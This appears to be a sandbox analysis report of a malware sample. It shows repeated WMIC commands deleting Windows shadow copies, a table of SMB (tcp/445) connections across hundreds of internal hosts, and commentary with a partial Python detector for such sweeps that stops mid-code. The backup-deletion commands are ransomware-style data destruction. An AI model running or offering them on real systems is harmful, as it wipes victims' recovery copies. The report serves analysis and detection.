C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9F6E7A5F-91E3-42B9-9E2A-D87FADA45EB4}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{314E70DD-6CC8-441F-8B30-A71AFD3666D4}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F28370CD-B12E-4E29-BDEC-FADD070A311C}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9CFA1FAC-8B30-464C-A41C-E8A415E47E56}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CE807F35-9C0E-4446-B318-8485AF6C0259}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{ED089E91-80BF-4ED9-8981-C380E00AF48A}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D1A50FE4-92ED-419B-8E4F-FD59A2FB70FF}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{95BCBF4B-AB01-429A-BC22-D699995F488D}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{D3411E52-7961-4272-BD9B-AC00A7C176FD}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5A5BC5FA-1945-4C64-98AB-48EB9B258476}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4209BC2E-63F3-4311-B318-4266CE6427FD}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0FB96D71-416E-4221-B050-53851A8DFEFF}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CA9D1DC0-6918-4793-9B97-17DC4DC11B7A}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{5F3413EA-0DE7-4717-9100-512425AA05AF}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B69ED39F-CDDB-47E0-81FC-5EF4BC215C92}'" delete
C:\Windows\system32\cmd.exe
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{C44555B4-BF9B-4600-B9BC-43446450A014}'" delete
Network
| Country | Destination | Proto | Domain |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.43:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.69:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.192:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| N/A | 10.127.255.77:445 | tcp | |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.83:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.165:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.247:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| N/A | 10.127.255.231:445 | tcp | |
| N/A | 10.127.255.228:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.244:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.195:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.186:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.253:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.189:445 | tcp | |
| N/A | 10.127.255.248:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.251:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.245:445 | tcp | |
| N/A | 10.127.255.201:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.240:445 | tcp | |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.209:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.234:445 | tcp | |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
| N/A | 10.127.255.252:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp | |
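The rows above are a single sample touching tcp/445 on hundreds of internal hosts, which is SMB host discovery ahead of lateral movement rather than ordinary file-share use. The following is an added example, not part of the sandbox report, that parses rows in the report's network-table layout and flags any private /24 with an unusually large number of distinct tcp/445 targets. SAMPLE is constructed: it fills the two /24 ranges the report's rows fall into (10.127.0.72-254 and 10.127.255.0-254) and adds two unrelated rows; the 16-host threshold is an assumption to tune per environment.

```python
"""Flag an SMB (tcp/445) host sweep in sandbox network rows.

Added example, not part of the sandbox report. Rows follow the report's
network table layout: | <domain> | <ip>:<port> | <proto> | <extra> |.
SAMPLE is constructed: it fills the two /24 ranges the report's rows fall
into (10.127.0.72-254 and 10.127.255.0-254) and adds two unrelated rows
for contrast.
"""
import ipaddress
import re
from collections import defaultdict

ROW_RE = re.compile(
    r"^\|\s*[^|]*?\s*\|\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s*\|\s*(?P<proto>\w+)\s*\|"
)
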